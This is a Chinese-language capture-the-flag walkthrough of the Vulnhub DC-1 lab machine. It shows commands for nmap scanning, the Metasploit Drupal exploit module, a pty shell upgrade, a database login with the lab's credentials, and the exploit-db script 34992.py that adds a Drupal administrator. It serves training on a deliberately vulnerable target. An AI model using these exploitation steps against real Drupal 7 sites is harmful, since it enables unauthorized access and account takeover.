Vulnhub靶机:DC-1渗透详细过程

这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。下面就直接开始吧。

Flag--1

ifconfig查kali的本机IP

Nmap 192.168.132.0/24扫描同一网段的存活IP获取目标IP

全面扫描:

Nmap -A 192.168.132.146 -p 1-65535

Vulnhub靶机:DC-1渗透详细过程_第1张图片

获取到开放端口22、80、111等

22端口一般思考到ssh远程连接,80端口思考到web网页攻击

且开放HTTP,所以直接访问网页。

根据插件可以看出本站是使用PHP语言编写的开源内容管理系统Drupal搭建的且版本为7.x

国外三大开源php CMS drupal 【无专用扫描器,但是msf内置了模块】 wordpress 【有专用扫描器】 joomla 【有专用扫描器】

进入msf控制台

msfconsole

搜索存在漏洞

search drupal

Vulnhub靶机:DC-1渗透详细过程_第2张图片

输入use 序号即可使用

use 1

使用info查看exp的说明

info

Vulnhub靶机:DC-1渗透详细过程_第3张图片

 修改RHOSTS的值

set RHOSTS 192.168.132.146

启动exp

run

Vulnhub靶机:DC-1渗透详细过程_第4张图片

可以看到一个会话已经建立,回车进入metepreter,打开shell

shell

查看当前权限

whoami

由于得到的shell环境不完整,所以我们需要在python中的pty模块下反弹一个完整的shell环境

python -c 'import pty;pty.spawn("/bin/sh")'

Vulnhub靶机:DC-1渗透详细过程_第5张图片

列出当前目录

ls

查看flag1.txt

cat flag1.txt(得到flag1)

Vulnhub靶机:DC-1渗透详细过程_第6张图片

Flag--2

根据flag1提示要去配置文件寻找

查看当前目录

pwd

去往/var/www/sites/default

cd /var/www/sites/default

查看配置文件settings.php

cat settings.php

Vulnhub靶机:DC-1渗透详细过程_第7张图片

Flag--3

flag2知一些信息,给出的是数据库相关信息,所以我们直接本地登陆数据库

Vulnhub靶机:DC-1渗透详细过程_第8张图片

mysql -udbuser -pR0ck3t

Vulnhub靶机:DC-1渗透详细过程_第9张图片

use drupaldb

Vulnhub靶机:DC-1渗透详细过程_第10张图片

show tables

Vulnhub靶机:DC-1渗透详细过程_第11张图片

看见一个user的表名,想着查看数据

select * from users;

Vulnhub靶机:DC-1渗透详细过程_第12张图片

为了看起来好看一些

select name,pass from user;

Vulnhub靶机:DC-1渗透详细过程_第13张图片

一看密码就是加密过的,不能暴力破解。

且flag2有提示,这里有俩种方法:

一、用exp添加一个管理员

# searchsploit是kali自带的一个exp查询工具,会从本地 / 远程的exploit-db查询exp / shellcode searchsploit drupal 查看漏洞攻击脚本 发现有一个针对于drupal 7的攻击版本可以增加管理员 然后利用python脚本增加管理员 local 34992.py

Vulnhub靶机:DC-1渗透详细过程_第14张图片python2 /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.132.146 -u IerkeU -p 666666

Vulnhub靶机:DC-1渗透详细过程_第15张图片

管理员账号添加成功

Vulnhub靶机:DC-1渗透详细过程_第16张图片

登入后台获取flag3

Vulnhub靶机:DC-1渗透详细过程_第17张图片

Flag--4

Vulnhub靶机:DC-1渗透详细过程_第18张图片

根据收集信息进入/home/flag4

cd /home/flag4

ls

cat flag4.txt

Vulnhub靶机:DC-1渗透详细过程_第19张图片

Flag--5

linux suid提权

Vulnhub靶机:DC-1渗透详细过程_第20张图片

Vulnhub靶机:DC-1渗透详细过程_第21张图片

 参考文章:

Vulnhub靶机系列: DC-1 | Tuzk1

Linux下用SUID提权_谢公子的博客-CSDN博客_suid提权

你可能感兴趣的:(#,靶场WP,php,安全,web安全)